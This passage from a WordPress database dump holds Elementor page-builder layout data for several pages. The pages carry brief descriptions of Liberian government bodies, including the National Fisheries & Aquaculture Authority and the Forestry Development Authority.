Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c87beee\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8467a48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"8e89038\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"eef1874\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9561,1666,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9562,1666,'_elementor_edit_mode','builder'),(9563,1666,'_elementor_template_type','wp-post'),(9564,1666,'_elementor_version','2.7.5'),(9565,1666,'_wp_page_template','default'),(9566,1666,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0abcc56\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"91f3255\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"49649b6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"8f526d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30ec225\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f8f5e4b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"49649b6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2f50533\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7dc41ec\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9567,1667,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9568,1667,'_elementor_edit_mode','builder'),(9569,1667,'_elementor_template_type','wp-post'),(9570,1667,'_elementor_version','2.7.5'),(9571,1667,'_wp_page_template','default'),(9572,1667,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a1cd518\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"055c11c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0b709e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e54035\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"9f9fd7c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0eac96c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c50620c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e54035\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"7bdc1da\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c46227a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9573,1668,'_elementor_edit_mode','builder'),(9574,1668,'_elementor_template_type','wp-post'),(9575,1668,'_elementor_version','2.7.5'),(9576,1668,'_wp_page_template','default'),(9577,1668,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1bb94b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0171c3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9578,1668,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}}'),(9579,1669,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(9580,1669,'_elementor_edit_mode','builder'),(9581,1669,'_elementor_template_type','wp-post'),(9582,1669,'_elementor_version','2.7.5'),(9583,1669,'_wp_page_template','default'),(9584,1669,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\